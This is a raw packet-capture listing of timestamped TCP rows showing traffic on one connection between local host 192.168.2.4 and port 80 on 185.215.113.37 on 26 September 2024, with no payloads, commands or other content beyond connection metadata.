Sep 26, 2024 22:40:17.888988018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.888998032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889014006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889029980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889043093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889045954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889061928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889085054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889113903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889130116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889147043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889159918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889163017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889179945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889195919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889228106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889332056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889383078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889427900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889445066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889460087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889471054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889477015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889492989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889494896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889508963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889523029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889535904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889544010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889559984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889573097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889574051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889590979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889609098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889615059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889626980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889640093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889648914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889674902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889683962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889703989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889707088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889719963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889735937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889740944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889753103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889769077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889770031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889789104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889801025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889806032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889822960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889847994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889872074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889889956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889889956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889899015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889914989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889916897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889930010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889942884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889946938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889962912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889965057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889980078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.889986992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.889995098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890012026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890028000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890032053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.890050888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.890053988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890069008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890084982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890089035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.890110970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890119076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.890126944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890142918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.890152931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890168905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890177011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.890183926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890202999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890217066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.890228033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890235901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.890245914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890261889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890274048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.890278101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890295982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890311003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890326977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890333891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.890343904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890361071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890362024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.890377998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890387058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.890396118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.890410900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.890446901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.016982079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.017040014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.017052889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.017162085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.017919064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.017935038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.017951965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.017966986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.017980099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018018961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018021107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018074036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018076897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018093109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018107891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018121004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018151999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018188000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018203020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018218040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018234015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018245935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018268108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018275023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018290997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018299103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018306971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018332005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018333912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018349886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018364906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018366098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018388987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018400908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018438101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018479109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018495083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018510103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018526077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018538952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018541098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018557072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018559933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018572092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018587112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018593073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018595934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018614054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018631935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018635035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018645048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018676043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018682003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018690109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018703938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018718958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018719912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018750906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018785954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018857956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018873930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018888950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018903971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018904924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018920898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018922091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018938065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018944979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018970013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.018979073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.018985987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019001961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019012928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019016981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019040108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019051075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019056082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019087076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019093990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019097090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019109011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019124031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019134998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019140005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019151926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019155979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019174099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019193888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019203901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019212008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019220114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019236088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019248962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019260883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019295931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019341946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019356966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019371033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019393921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019393921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019407988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019412041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019427061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019442081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019443035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019449949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019458055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019474030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019481897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019495964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019496918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019520044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019530058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019535065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019561052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019577980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019582987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019593954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019609928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019623041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019627094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019643068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019656897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019659996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019690037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019692898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019711971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019751072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019802094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019818068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019831896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019845963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019848108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019862890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019865036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019881010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019885063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019896030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019912004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.019917965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019939899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.019969940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.146279097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.146327019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.146344900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.146413088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.146481991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.147089005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147104979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147133112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147164106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147180080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147197008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147214890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147232056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147245884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147301912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.147337914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147353888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147356987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.147372007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147427082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.147427082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.147475004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147489071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147542953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.147757053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147785902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147803068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147814989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.147850990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.147861004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147876978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147897959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147927999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.147958994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.147979021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.147994995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148010015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148026943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148041964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148042917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148061991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148080111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148089886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148094893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148108959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148113012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148130894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148171902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148173094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148189068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148204088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148221016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148222923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148262024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148291111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148298025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148307085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148324013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148339987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148355961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148366928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148370981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148391008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148397923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148413897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148413897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148431063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148449898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148453951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148473024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148493052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148509026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148511887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148525000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148541927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148556948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148560047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148560047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148574114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148585081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148590088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148624897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148638964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148638010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148654938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148672104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:18.148675919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:18.148714066 CEST	49730	80	192.168.2.4	185.215.113.37
